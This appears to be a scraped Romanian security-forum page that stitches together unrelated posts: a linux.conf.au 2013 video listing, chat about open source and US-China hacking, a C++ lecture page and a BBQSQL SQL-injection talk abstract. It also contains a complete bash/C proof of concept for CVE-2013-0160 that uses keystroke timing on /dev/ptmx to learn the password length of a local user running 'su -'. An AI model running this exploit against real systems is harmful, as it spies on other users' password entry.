right]04-Feb-2013 09:45 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Big_and_Little_Endian_inside_out.mp4[/TD] [TD=align: right]04-Feb-2013 10:25 [/TD] [TD=align: right]112M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD] [TD=align: right]02-Feb-2013 17:46 [/TD] [TD=align: right]7.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD] [TD=align: right]03-Feb-2013 17:41 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_a_free_software_telemetry_radio_system.mp4[/TD] [TD=align: right]02-Feb-2013 21:05 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 16:18 [/TD] [TD=align: right]155M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD] [TD=align: right]02-Feb-2013 18:51 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD] [TD=align: right]02-Feb-2013 20:05 [/TD] [TD=align: right] 54M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing.mp4[/TD] [TD=align: right]03-Feb-2013 17:35 [/TD] [TD=align: right]210M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing_Lightning_Talks.mp4[/TD] [TD=align: right]03-Feb-2013 17:20 [/TD] [TD=align: right]124M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD] [TD=align: right]02-Feb-2013 19:11 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD] [TD=align: right]02-Feb-2013 20:07 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD] [TD=align: right]04-Feb-2013 13:20 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Free_and_open_source_software_and_activism.mp4[/TD] [TD=align: right]04-Feb-2013 13:10 [/TD] [TD=align: right]167K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Future_directions_for_the_X_Window_System.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD] [TD=align: right]02-Feb-2013 19:20 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD] [TD=align: right]02-Feb-2013 18:48 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_For_Ages_4_And_Up.mp4[/TD] [TD=align: right]02-Feb-2013 22:52 [/TD] [TD=align: right]342M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_not_just_for_source_code_anymore.mp4[/TD] [TD=align: right]02-Feb-2013 20:29 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD] [TD=align: right]03-Feb-2013 18:12 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]HEADER.html[/TD] [TD=align: right]06-Feb-2013 11:05 [/TD] [TD=align: right]4.4K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD] [TD=align: right]03-Feb-2013 16:38 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD] [TD=align: right]04-Feb-2013 09:27 [/TD] [TD=align: right] 69M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_Fix_a_Font.mp4[/TD] [TD=align: right]03-Feb-2013 00:15 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_make_almost_anything_go_faster.mp4[/TD] [TD=align: right]03-Feb-2013 00:02 [/TD] [TD=align: right] 51M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_use_Puppet_like_an_Adult.mp4[/TD] [TD=align: right]03-Feb-2013 11:56 [/TD] [TD=align: right] 85M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD] [TD=align: right]03-Feb-2013 01:37 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Radia_Perlman.mp4[/TD] [TD=align: right]03-Feb-2013 11:33 [/TD] [TD=align: right]117M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD] [TD=align: right]04-Feb-2013 12:19 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD] [TD=align: right]04-Feb-2013 09:34 [/TD] [TD=align: right] 56M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 35M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Main_conference_opening.mp4[/TD] [TD=align: right]02-Feb-2013 17:57 [/TD] [TD=align: right] 84M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_Mobile_Communications_Secure.mp4[/TD] [TD=align: right]04-Feb-2013 11:05 [/TD] [TD=align: right]116M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD] [TD=align: right]02-Feb-2013 19:34 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD] [TD=align: right]02-Feb-2013 21:02 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Maximum_Clojure_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 21:04 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 22:03 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MySQL_in_the_cloud_as_a_service.mp4[/TD] [TD=align: right]03-Feb-2013 17:17 [/TD] [TD=align: right]166M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NetFPGA_USB_2_interface.mp4[/TD] [TD=align: right]02-Feb-2013 22:40 [/TD] [TD=align: right]148M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD] [TD=align: right]03-Feb-2013 16:41 [/TD] [TD=align: right] 97M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD] [TD=align: right]04-Feb-2013 12:24 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4

Chinese experts slam U.S. hacking accusations - People's Daily Online US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed 'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News

Da, ai dreptate, munca pe bani putini. Dar sa nu uitam ca open-source nu inseamna lipsa unei finantari. Companiile mari care fac practic bani de pe urma proiectelor open-source platesc oameni sa lucreze la aceste proiecte. Un exemplu ar fi Intel si un exemplu de proiect e chiar kernelul de Linux. Daca procesoarele lor nu ar functiona pe Linux ar fi nasol, deci investesc in programatori de kernel. Cam asa e si cu alte proiecte, se mai adauga donatii in unele cazuri sau sponsorizari, cum e cazul OpenSSL care asteapta sponsorizari de 50K dolari. Dar daca suntem atenti, ne dam seama ca ofera suport FIPS, certificare care costa cam 50K dolari. Ce poate fi util pentru acesti tineri pe langa faptul ca invata multe lucruri noi si utile e faptul ca ajung sa lucreze la companii mari gen Google care ii vor trata bine.

Uuu, shit just got serious... Avem cele doua tabere: 1. Chinezii cu vorba aia: Cum sparg chinezii o parola? Incearca fiecare cate una. Adica sunt multi -> potential 2. Americanii care sunt baieti cu bani si pot plati niste indieni cu 2 dolari pe an sa le faca treburile murdare Pe cine pariati?

De pe Jurnalul, aceeasi stire: "Cei 334 de elevi participanti din 36 de ??ri au trebuit sa rezolve 1925 de diferite teme si sarcini propuse de organizatiile open source" "Cei 20 au rezolvat 576 de teme anun?? Google Open Source" Aparent el a lucrat la BRL-CAD | Open Source Solid Modeling . Sunt curios daca aceste initiative sunt ok, sau companiile doar pun niste copii sa le faca treaba Se pare ca alte proiecte pe acolo au mai fost Fedora, NetBSD, KDE si Haiku. Interesant.

Vine HTML 5 si nu mai e nevoie nici de Java nici de Flash.

Da, frumos articol

[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h] [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 63.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 374.7 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 444.2 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 821.3 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 573.1 MB High Quality WMV (PC, Xbox, MCE) In part 8, STL digs into the do-while loop, casts, one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn. See part 1: Name Lookup See part 2: Template Argument Deduction See part 3: Overload Resolution See part 4: Virtual Functions See part 5: Explicit and Partial Specialization See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP) See part 7: Usual Arithmetic Conversions and Template Metaprogramming Sursa: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9

Rapid Blind Sql Injection Exploitation With Bbqsql Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests. Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University. Twitter: @mastahyeti Ben Toews (mastahyeti) Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University. Twitter: @HelloArbit Scott Behrens (Arbit) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Rapid Blind Sql Injection Exploitation With Bbqsql

[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h] #!/bin/bash # ptmx-su-pwdlen.sh -- This PoC determine the password length of a local # user who runs "su -". Done thanks to the ptmx keystroke timing attack # (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for # more information. # # Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64). # # "THE BEER-WARE LICENSE" (Revision 42): # <vladz@devzero.fr> wrote this file. As long as you retain this notice # you can do whatever you want with this stuff. If we meet some day, and # you think this stuff is worth it, you can buy me a beer in return. -V. if ps -e -o cmd= | egrep -q "^(-|^)su"; then echo "[-] Kill/close all running \"su\" session before using this PoC" exit 1 fi exe=$(mktemp) || exit 1 tmp=$(mktemp) || exit 1 cat > ${exe}.c << _EOF_ #include <stdio.h> #include <signal.h> #include <unistd.h> #include <sys/inotify.h> static int count = 0; void display_result() { printf("[+] password len is %d\n", count-1); _exit(0); } int main() { int fd; char buf[1024]; signal(SIGINT, display_result); fd = inotify_init(); inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY); while(read(fd, buf, 1024)) count++; return 0; } _EOF_ cc -o ${exe}{,.c} echo " [*] Wait for someone to run \"su -\"" while true; do ps -e -o cmd= | egrep "^(-|^)su" >${tmp} x=$(wc -l ${tmp}) case ${x% *} in 1) (( run )) && continue; echo -n "[+] su detected, full command: " cat ${tmp}; ${exe} & (( run = 1 )) ;; 2) [ ! -z "$!" ] && kill -2 $!; break ;; esac done rm -f ${exe}{,.c} ${tmp} Sursa: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure

Captureaza un request si arata-mi exact cum il trimite browser-ul tau. Asta ca sa nu stau eu cu tcpdump ca mor.

http://i49.tinypic.com/2rz75n6.png

Cred ca glumesti... Acolo nu sunt puse cu [ IMG ] , sunt doar niste link-uri. Imgur: Imageshack: Nu iti apar?

No pula, acum sunt multe de China, Indonezia, Brazilia si alte tari de care nu am auzit Cati vizitatori avem: There are currently 1517 users online. 81 members and 1436 guests Asta e tot ce pot fetele? netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | sort -u

Detalii: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf